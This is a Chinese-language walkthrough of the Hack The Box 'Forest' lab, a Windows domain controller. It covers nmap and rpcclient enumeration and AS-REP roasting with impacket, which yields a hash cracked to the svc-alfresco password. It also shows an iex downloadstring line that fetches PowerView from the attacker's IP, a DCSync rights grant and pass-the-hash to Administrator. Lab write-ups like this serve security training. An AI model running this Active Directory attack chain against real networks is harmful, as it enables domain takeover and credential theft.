基本信息

端口扫描

windows域服务器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
$ nmap -sC -sV 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 13:27 CST
Nmap scan report for 10.10.10.161
Host is up (0.068s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-10 05:34:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-11-09T21:34:54-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-10T05:34:51
|_ start_date: 2020-11-10T03:18:44

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.57 seconds

rpcclient

rpc可以匿名登录,枚举信息:

1
2
3
rpcclient -U "" 10.10.10.161
Enter WORKGROUP\'s password:
rpcclient $>

enumdomusers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[wasim] rid:[0x1db1]

users

把用户名提取出来,作为字典

1
2
3
4
5
6
7
8
Administrator
sebastien
lucinda
svc-alfresco
andy
mark
santi
wasim

GetNPUsers

就是使用前面得到的用户名字典,执行GetNPUsers,如果能够成功得到hash,就可以进行AS-REP Roasting:

1
2
3
4
5
6
for user in $(cat users.txt);do python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb.local/${user};done
...
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0d853aa9ac40a229135644f5fc9c50c4$52bf89e2f77cb3e0a78dbe00bb3051b6e52488c2b2f090d5d22b768c6f1180fe5ad3b07fdd91497579bb0e6c24933f6dab51e92ffa94b380df3725326e27ea03bacad08192bf6e15ecabe6cc79ec3d38f05cf64235c8c3d5d5c1c6bd160db3e3a9e70520e2546c8627b344208ce05d65622f9bc1afdb0784282de0c6fc2523ad8a4c18f673a00fda94c706534fca8124069f9dfca7aabb6419b29afd8227e917caf5f5414ec87740b90f0c1a4e4e20f6c1e196115696bb52a096b3e2484fe04f5d266743a96ed4173baa36d1cd1412c945573ad0d53d1f74e068cdbebc04da3aa11ea8b53ebc
Impacket v0.9.22.dev1+20201105.154342.d7ed8dba - Copyright 2020 SecureAuth Corporation
...

john

破解得到的hash,得到svc-alfresco账户密码:

1
2
3
4
5
6
7
➜  Forest sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
...

s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

...

user flag

5985端口开放,可以直接使用winrm登录,桌面得到user.txt:

BloodHound

然后就是BloodHound搜集信息,分析到域管的攻击路径:

上传,运行,下载结果,本地导入分析:

提权

Exchange Windows Permissions

首先需要加入到Exchange Windows Permissions组中:

1
net group "Exchange Windows Permissions" svc-alfresco /add /domain

然后Exchange Windows Permissions组有WriteDacl权限:

WriteDacl

滥用权限,使得我们可以执行DCSync,需要首先导入powerview:

会自动清理,所以整合成一行执行:

1
2
3
iex(new-object net.webclient).downloadstring('http://10.10.14.3:9999/PowerView.ps1')

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

DCSync

然后我们就可以用svc-alfresco账号执行DCSync,获取hash:

root flag

然后直接使用hash登录Administrator账号,桌面得到root.txt:

参考资料